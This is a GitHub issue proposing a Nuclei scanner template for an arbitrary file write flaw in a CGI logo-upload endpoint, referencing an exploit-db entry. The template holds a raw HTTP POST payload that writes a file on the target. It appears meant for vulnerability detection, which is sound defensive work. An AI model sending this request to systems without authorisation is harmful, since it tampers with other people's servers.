### ISSUE TITLE
arbitrary-file-write

### ISSUE THREAD

**Issue by Chakraborty-Arpan** [projectdiscovery/nuclei-templates#3850]
### Template Information:

--- 
id: arbitrary-file-write
info: 
  author: hackerarpan
  name: arbitrary-file-write
  severity: critical
  tags: arbitrary-file-write
  reference:
    - https://www.exploit-db.com/exploits/50639

### Nuclei Template:

```yaml
requests: 
  - 
    matchers: 
      - 
        part: header
        status: 
          - 200
        type: status
    raw: 
      - |
          POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1
          Host: {{Hostname}}
          Connection: close
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
          Accept: */*
          Content-Type: application/octet-stream
          Content-Length: 24
          Connection: close
          
          admin.file1
          No contents
```
